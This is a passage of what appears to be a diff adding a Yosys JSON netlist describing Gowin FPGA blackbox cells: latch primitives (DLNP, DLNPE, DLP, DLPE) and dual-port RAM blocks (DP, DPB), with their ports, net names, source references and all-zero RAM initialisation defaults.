"hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:130.8-130.9" + } + } + } + }, + "DLNP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:149.1-153.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 4 ] + }, + "Q": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:150.7-150.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:150.10-150.11" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:150.13-150.19" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:151.8-151.9" + } + } + } + }, + "DLNPE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:156.1-160.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "Q": { + "direction": "output", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:157.21-157.23" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:157.7-157.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:157.10-157.11" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:157.13-157.19" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:158.8-158.9" + } + } + } + }, + "DLP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:107.1-111.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 4 ] + }, + "Q": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:108.7-108.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:108.10-108.11" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:108.13-108.19" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:109.8-109.9" + } + } + } + }, + "DLPE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:114.1-118.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "Q": { + "direction": "output", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:115.21-115.23" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:115.7-115.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:115.10-115.11" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:115.13-115.19" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:116.8-116.9" + } + } + } + }, + "DP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1641.1-1726.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000010000", + "BIT_WIDTH_1": "00000000000000000000000000010000", + "BLK_SEL": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE0": "0", + "READ_MODE1": "0", + "RESET_MODE": "SYNC", + "WRITE_MODE0": "00", + "WRITE_MODE1": "00" + }, + "ports": { + "DOA": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 ] + }, + "DOB": { + "direction": "output", + "bits": [ 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ] + }, + "DIA": { + "direction": "input", + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49 ] + }, + "DIB": { + "direction": "input", + "bits": [ 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 66, 67, 68 ] + }, + "ADA": { + "direction": "input", + "bits": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ] + }, + "ADB": { + "direction": "input", + "bits": [ 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 ] + }, + "WREA": { + "direction": "input", + "bits": [ 97 ] + }, + "WREB": { + "direction": "input", + "bits": [ 98 ] + }, + "CLKA": { + "direction": "input", + "bits": [ 99 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 100 ] + }, + "CEA": { + "direction": "input", + "bits": [ 101 ] + }, + "CEB": { + "direction": "input", + "bits": [ 102 ] + }, + "OCEA": { + "direction": "input", + "bits": [ 103 ] + }, + "OCEB": { + "direction": "input", + "bits": [ 104 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 105 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 106 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1719.14-1719.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1719.19-1719.22" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 66, 67, 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1718.13-1718.19" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 101 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1722.7-1722.10" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 102 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1722.12-1722.15" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 99 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1721.7-1721.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 100 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1721.13-1721.17" + } + }, + "DIA": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1717.14-1717.17" + } + }, + "DIB": { + "hide_name": 0, + "bits": [ 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1717.19-1717.22" + } + }, + "DOA": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1716.15-1716.18" + } + }, + "DOB": { + "hide_name": 0, + "bits": [ 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1716.20-1716.23" + } + }, + "OCEA": { + "hide_name": 0, + "bits": [ 103 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1723.7-1723.11" + } + }, + "OCEB": { + "hide_name": 0, + "bits": [ 104 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1723.13-1723.17" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 105 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1724.7-1724.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 106 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1724.15-1724.21" + } + }, + "WREA": { + "hide_name": 0, + "bits": [ 97 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1720.7-1720.11" + } + }, + "WREB": { + "hide_name": 0, + "bits": [ 98 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1720.13-1720.17" + } + } + } + }, + "DPB": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:984.1-1066.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000010000", + "BIT_WIDTH_1": "00000000000000000000000000010000", + "BLK_SEL_0": "000", + "BLK_SEL_1": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": 